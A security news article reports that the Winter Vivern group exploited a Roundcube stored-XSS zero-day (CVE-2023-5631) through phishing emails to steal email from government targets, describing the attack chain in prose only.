On October 11, 2023, the threat actor group known as Winter Vivern was detected exploiting a zero-day vulnerability in Roundcube webmail software, allowing them to harvest sensitive email messages from targeted accounts.
According to ESET security researcher Matthieu Faou, the group has elevated its offensive by leveraging a newly discovered flaw in Roundcube. Previously, Winter Vivern focused on exploiting known vulnerabilities in both Roundcube and Zimbra, where exploit code was publicly available, but this new approach marks a significant escalation.
Winter Vivern, also referred to as TA473 and UAC-0114, aligns its objectives with the geopolitical agendas of Belarus and Russia. In recent months, the group has been implicated in attacks against entities within Ukraine and Poland, as well as government organizations across Europe and India.
Additionally, the group exploited another Roundcube vulnerability (CVE-2020-35730) in prior months, marking its position as just the second nation-state group, following APT28, to target this specific open-source webmail application.
The recent vulnerability is identified as CVE-2023-5631 (CVSS score: 5.4), classified as a stored cross-site scripting (XSS) vulnerability. This flaw permits a remote adversary to inject arbitrary JavaScript code, a fix for which was issued on October 16, 2023.
Attack strategies employed by Winter Vivern initiate with a phishing message that embeds a Base64-encoded payload within the HTML. This payload subsequently decodes to facilitate a JavaScript injection from a command-and-control (C2) server, exploiting the XSS vulnerability.
Faou elaborates, stating, “These specially crafted email messages allow attackers to load arbitrary JavaScript code directly into the Roundcube user’s browser window, requiring no manual interaction apart from simply viewing the message.”
The second-stage script (checkupdate.js) acts as a loader, enabling the execution of a subsequent JavaScript payload targeting the exfiltration of email messages to the C2 server. Despite the relative simplicity of the group’s tactics, the persistent nature of their phishing campaigns poses a significant threat, particularly to governmental institutions in Europe, many of which deploy internet-facing applications containing known vulnerabilities that are not routinely updated.
